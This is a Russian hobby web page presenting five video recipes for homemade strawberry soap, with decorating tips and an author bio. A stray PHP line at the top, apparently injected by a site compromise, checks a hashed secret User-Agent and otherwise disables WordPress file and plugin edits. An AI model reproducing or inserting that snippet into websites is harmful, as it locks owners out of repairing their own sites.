if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 5 видеорецептов, как сделать своими руками клубничное мыло | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

5 видеорецептов, как сделать своими руками клубничное мыло

За кожей рук необходимо следить также тщательно, как и осуществлять уход за волосами или кожей лица. Современная продукция не может похвастаться отличным качеством, поэтому о защите Ваших рук, необходимо заботиться самостоятельно

За кожей рук необ­хо­ди­мо сле­дить так­же тща­тель­но, как и осу­ществ­лять уход за воло­са­ми или кожей лица. Совре­мен­ная про­дук­ция не может похва­стать­ся отлич­ным каче­ством, поэто­му о защи­те Ваших рук, необ­хо­ди­мо забо­тить­ся само­сто­я­тель­но. Мыло, долж­но быть не толь­ко каче­ствен­ным, но и внешне при­вле­ка­тель­ным, тако­го эффек­та мож­но добить­ся толь­ко при помо­щи соб­ствен­но­го мыловаренья.

Вот сего­дня я и подо­бра­ла 5 видео, как сде­лать мыло “клуб­нич­ный цве­ток”, “клуб­ни­ка” или про­сто “клуб­нич­ный пирог”. Все это без тру­да каж­дый сде­ла­ет само­сто­я­тель­но в домаш­них усло­ви­ях, а глав­ным ком­по­нен­том все­го соста­ва, конеч­но, явля­ет­ся аро­ма­ти­за­тор клуб­ни­ки и вани­ли, и цве­то­вой краситель.

В каче­стве укра­ше­ния клуб­нич­но­го мыла исполь­зуй­те мыль­ные клуб­нич­ки и глит­тер, пере­ли­ва­ю­щий­ся несколь­ки­ми оттен­ка­ми. Совет — не пере­усерд­ствуй­те с клуб­нич­ным аро­ма­ти­за­то­ром и глит­те­ром, в про­тив­ном слу­чае, руки при­дет­ся мыть очень дол­го. После при­го­тов­ле­ния боль­шо­го десер­та — “клуб­нич­но­го пиро­га”, Вы полу­чи­те мно­го неболь­ших кусоч­ков, на раз­ре­зе кото­рых, заво­ра­жи­ва­ю­щие взгляд разводы.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!